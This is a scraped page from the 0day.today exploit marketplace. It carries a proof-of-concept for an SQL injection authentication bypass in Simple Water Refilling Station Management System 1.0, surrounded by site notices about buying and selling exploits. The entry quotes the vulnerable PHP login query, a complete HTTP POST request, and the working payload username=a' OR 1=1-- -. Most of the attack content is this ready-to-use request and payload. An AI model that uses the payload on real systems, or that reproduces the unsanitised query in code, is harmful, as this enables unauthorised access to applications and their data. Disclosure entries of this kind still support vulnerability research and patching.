0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Simple Water Refilling Station Management System 1.0 - Authentication Bypass Vulnerability
# Exploit Title: Simple Water Refilling Station Management System 1.0 - Authentication Bypass # Exploit Author: Matt Sorrell # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/14906/simple-water-refilling-station-management-system-php-free-source-code.html # Version: 1.0 # Tested On: Windows Server 2019 and XAMPP 7.4.22 # The Simple Water Refilling Station Management System # is vulnerable to a SQL Injection because it fails to sufficiently sanitize # user-supplied data before using it in a SQL query. Successful exploitation # of this issue could allow an attacker to bypass the application's # authentication controls and possibly access other sensitive data. # Vulnerable Code: Line 21 in water_refilling/classes/Login.php qry = $this->conn->query("SELECT * from users where username = '$username' and password = md5('$password') "); # Vulnerable Request POST /water_refilling/classes/Login.php?f=login HTTP/1.1 Host: localhost Connection: keep-alive Content-Length: 35 sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Google Chrome";v="92" Accept: */* X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/water_refilling/admin/login.php Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=64v67e3dctju48lon9d8gepct7 username=a&password=a # Vulnerable Payload # Parameter: username (POST) username=a'+OR+1%3D1--+-&password=a # 0day.today [2024-09-29] #